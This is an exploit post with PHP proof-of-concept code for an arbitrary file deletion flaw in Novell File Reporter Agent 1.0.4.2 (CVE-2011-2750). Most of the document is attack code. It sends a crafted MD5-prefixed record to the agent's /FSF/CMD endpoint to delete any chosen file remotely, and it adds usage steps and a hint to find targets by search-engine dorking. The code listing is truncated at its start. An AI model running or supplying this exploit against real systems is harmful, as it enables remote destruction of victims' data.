=============================================================================================================================================
| # Title : NFR Agent 1.0.4.2 Arbitrary File Delete Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.opentext.com/products/listing?o=mf |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: The code exploits a vulnerability in the Novell File Reporter Agent, which allows an attacker to remotely delete any file on the targeted system. It affects version 1.0.4.2 and below.
(Related : https://packetstorm.news/files/id/180891/ Linked CVE numbers: CVE-2011-2750 ) .
[+] save code as poc.php.
[+] Set taget : Line 57.
[+] USage : php poc.php
[+] PayLoad :
target = $target;
$this->port = $port;
$this->ssl = $ssl;
$this->filePath = $filePath;
}
private function md5Upper($data) {
return strtoupper(md5($data));
}
public function deleteFile() {
$protocol = $this->ssl ? 'https' : 'http';
$url = "$protocol://{$this->target}:{$this->port}/FSF/CMD";
$record = "SRS45{$this->filePath}";
$md5Hash = $this->md5Upper('SRS' . $record . 'SERVER');
$message = $md5Hash . $record;
$response = $this->sendPostRequest($url, $message);
if ($response && strpos($response, '0') !== false) {
echo "[+] File {$this->filePath} successfully deleted\n";
} else {
echo "[-] File not deleted\n";
}
}
private function sendPostRequest($url, $data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: text/xml"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
if ($this->ssl) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
}
// استخدام الكود
$exploit = new NovellFileReporterExploit('target_ip_here');
$exploit->deleteFile();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================